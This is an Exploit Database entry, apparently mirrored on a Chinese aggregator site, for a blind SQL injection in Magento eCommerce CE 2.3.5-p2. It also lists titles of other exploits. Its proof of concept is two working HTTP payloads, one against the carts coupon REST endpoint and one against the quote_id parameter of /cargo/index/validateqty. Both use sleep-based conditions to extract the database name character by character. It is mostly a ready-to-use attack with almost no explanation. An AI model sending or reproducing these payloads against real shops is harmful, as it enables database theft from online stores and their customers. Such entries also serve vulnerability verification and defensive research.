Magento eCommerce CE v2.3.5-p2 – Blind SQLi

Exploit Database
34 阅读

作者： Aydin Naserifard

日期： 2022-05-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50896/

Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link:https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]

POC:

1)PUT
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23

2)POST /cargo/index/validateqty
[quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23

last Exploits
Magento eCommerce CE v2.3.5-p2 – Blind SQLi的更多信息

SPIP 3.1.1/3.1.2 – File Enumeration / Path Traversal：
Secure E-commerce Script 1.02 – ‘sid’ SQL Injection：
Linksys RE6500 1.0.11.001 – Unauthenticated RCE：
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation：
Ubee EVW3226 Modem/Router 1.0.20 – Multiple Vulnerabilities：
D-Link Dir-600M N150 – Cross-Site Scripting：
WEMS BEMS 21.3.1 – Undocumented Backdoor Account：
mintinstall 7.9.9 – Code Execution：